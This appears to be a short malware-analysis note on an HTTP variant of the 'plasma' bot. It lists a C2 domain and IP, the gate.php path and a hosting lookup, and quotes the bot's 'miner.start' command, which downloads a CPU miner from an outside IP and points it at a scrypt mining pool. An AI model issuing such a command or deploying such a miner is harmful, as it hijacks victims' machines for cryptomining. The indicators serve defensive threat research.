Resolved illuminati.sx to 188.8.131.52
Gate file: /http/gate.php
This is the first time I have seen the HTTP version of plasma and it sucks hard. It seems to be a slightly upgraded version of the old barracuda HTTP bot, with few of the problems fixed.
Hosting info: http://whois.domaintools.com/184.108.40.206
Bitcoin mining info:
miner.start http://220.127.116.11/miner/CPUMiner.files *-a scrypt -o stratum+tcp://pool.d2.cc:3335 -O avaster.x:x -t THREADS*
Related md5s (Download sample from Malwr.com)